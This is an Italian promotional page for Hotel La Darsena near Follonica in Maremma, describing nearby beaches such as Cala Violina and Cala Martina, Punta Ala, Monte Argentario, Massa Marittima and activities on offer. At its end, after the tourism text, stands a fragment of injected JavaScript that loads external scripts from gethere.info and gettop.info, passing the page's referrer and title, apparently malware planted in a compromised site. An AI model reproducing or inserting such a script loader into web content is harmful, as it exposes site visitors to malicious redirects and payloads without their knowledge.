Hotel La Darsena. Una posizione privilegiata per scoprire la Maremma.

 

Il Nuovo Hotel la Darsena è situato in località Il Puntone, dista 7 Km da Follonica e da Punta Ala. La sua posizione privilegiata, vicina ai centri più noti della Costa Maremmana consente di scoprire tutto il fascino di questa terra dai mille volti.

 

Una vacanza presso l’Hotel La Darsena consentirà infatti di visitare famose località balneari come Castiglione della Pescaia, Punta Ala, Baratti, ma anche immergersi nella natura selvaggia del Parco della Maremma e immergersi nell’antichità andando alla scoperta dei reperti archeologici etruschi di Vetulonia.

 

Una vacanza in Maremma è da sempre un viaggio nella natura e nella storia. Un’occasione di divertimento e scoperta grazie alle numerose possibilità che offre il territorio. 

 

Gli amanti dell’avventura potranno infatti approfittare dei suggestivi sentieri da percorrere a piedi, in mountain bike o in bici (noleggiabili presso la struttura) oppure a cavallo. 

 

Interessanti convenzioni sono disponibili per poter effettuare corsi di: Vela, Surf, Kite Surf, Diving, Equitazione, Golf e Tiro con l’Arco.

 

Per gli ospiti interessati a conoscere le città d’arte più famose della Toscana, Hotel La Darsena organizza visite in città come Siena, Pisa e Firenze, ma anche indimenticabili minicrociere nelle Isole dell’Arcipelago Toscano.

La Maremma è anche una terra ricca di antiche tradizioni culinarie e prodotti tipici che gli ospiti dell’Hotel potranno conoscere attraverso le degustazioni di vino, olio e altre specialità, organizzate in aziende locali.

BARCA A VELA

KITE SURF

GOLF

ESCURSIONI A CAVALLO

DIVING

TIRO CON L’ARCO

Alcune delle più suggestive località nei dintorni, che vi lasceranno senza fiato

Cala Violina

 

cala-violina

 

La spiaggia di Cala Violina si trova nel cuore della Riserva Naturale delle Bandite di Scarlino, grande complesso forestale tra Castiglione della Pescaia e Follonica. La spiaggia di Cala Violina dista solo 4.8 Km dall’Hotel ed è raggiungibile a piedi attraverso un gradevole percorso nella natura, ma anche in mountain bike o a cavallo.
Questa paradisiaca spiaggia è considerata la baia più bella di tutta la Toscana e dal 2004 viene annualmente premiata come una delle 11 spiagge italiane più belle e incontaminate. Deve il suo nome alla particolare natura della sabbia, bianca e fine, che, se calpestata a piedi nudi, emette il dolce suono di un violino. E’ anche nota per le sue acquee trasparenti che consentono di apprezzare fondali di rara bellezza, formati da banchi di Posidonia Oceanica, massi di arenaria e pesci di ogni colore e dimensione.
Dalla spiaggia è possibile godere di spettacolari vedute sulla baia di Follonica e di Punta Ala e nelle terse giornate estive è possibile ammirare le Isole d’Elba, Montecristo, Cerboli e se sarete fortunati, le montagne della Corsica .

Cala Martina

 

cala-martina

 

Cala Martina è una bellissima spiaggia situata nel golfo di Follonica, vicinissima a Cala Violina, distante dall’Hotel solo 3 Km, a nord del litorale di Castiglione della Pescaia. Questo gioiello di natura e mare è una Cala di piccole dimensioni dall’atmosfera intima e suggestiva, caratterizzata da sabbia finissima e dorata, bagnata da acque pulite e avvolta dalla profumata e fitta macchia mediterranea. Meno conosciuta della famosa Cala Violina, è però altrettanto bella e suggestiva.
Lungo il sentiero che conduce alla cala, si trova un monumento in onore di Garibaldi, che qui si fermò per rifornirsi di munizioni prima dello sbarco in Sicilia.

Monte Argentario

 

argentario

 

Monte Argentario era probabilmente in origine un’isola successivamente “ancorata” alla costa tirrenica dai tomboli della Feniglia e della Giannella, formatisi per l’accumolo dei detriti trasportati dai fiumi e dalle correnti marine.

 

Il Promontorio, interamente montuoso (m 635) è caratterizzato da coste alte e rocciose, dove si può ammirare la famosa palma nana che nasce spontanea in loco, è ricoperta da una fitta macchia mediterranea, che si alterna alle coltivazioni di olivi, di viti e di alberi da frutto. Nei vigneti, faticosamente ricavati terrazzando i fianchi del monte, si coltivano i rari vitigni Ansonico e Riminese.

 

L’economia dell’Argentario, un tempo basata esclusivamente sulla pesca, trova oggi nel turismo la sua principale risorsa.

Follonica

 

follonica

 

Follonica è una famosissima località balneare ricercata e ben attrezzata, raggiungibile in pochi minuti di auto dall’Hotel La Darsena.
La cittadina vanta una bella passeggiata lungomare che segue la costa per circa 2 km e mostra il litorale in tutta la sua bellezza, particolarmente apprezzato dalle famiglie che possono contare sulla sicurezza delle sue acque protette dal golfo e dalla presenza della pineta, magnifico luogo di svago per i bimbi che possono giocare in piena libertà al riparo dal sole.
Grazie ad un’attenta politica ambientale e soprattutto alla bellezza dei posti, Follonica ogni estate riesce ad ottenere il prestigioso premio delle “Vele” di Legambiente.

 

La sera tutto il centro e il lungomare si animano, pullulano di gente fino a notte tarda, grazie alla presenza di numerosi ristoranti e locali dove è possibile cenare e tirare fino a tardi, approfittando del magnifico clima sereno che caratterizza la città, anche in piena stagione balneare.

Punta Ala

 

puntala

 

Punta Ala non ha bisogno di presentazioni, è una delle località turistiche più esclusive del litorale tirrenico; basta ricordarsi che qui era la base operativa e di allenamento di Luna Rossa.

Punta Ala è uno dei più riusciti insediamenti turistici del dopoguerra: inserita con “discrezione” nella immensa pineta, offre al visitatore la pulizia dei suoi viali, i suoi prati e le aiuole curate, l’eleganza dei suoi giardini sempre ben tenuti. Importante attrezzatura turistica è il porto (900 esclusivi posti barca), che offre la possibilità di noleggiare barche, motoscafi, yachts, con o senza marinaio.

Notevole il campo da golf, uno dei più grandi d’Europa, sede di importanti gare internazionali.

Massa Marittima

 

massa-marittima

 

Massa Marittima è suggestivo borgo medievale adagiato tra le Colline Metallifere, circondato dalla campagna maremmana e ricco di bellezze storiche, ambientali, artistiche ed architettoniche ereditate da un florido passato.
Percorrendo gli stretti vicoli in salita del caratteristico centro storico è possibile raggiungere la parte più alta della città e godere di un suggestivo panorama dalla valle al mare e di impareggiabili tramonti. Molti dei luoghi più belli di Massa Marittima sono concentrati nella pregevole Piazza della città, ma la zona è anche conosciuta per altre attrazioni, come il Parco Carapax, centro europeo per la salvaguardia di tutte le specie di tartarughe, che accoglie anche un gran numero di cicogne. Nei dintorni anche il Parco delle Colline Metallifere Grossetane facente parte dei geoparchi riconosciuti dall’Unesco.

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { topspyapps.net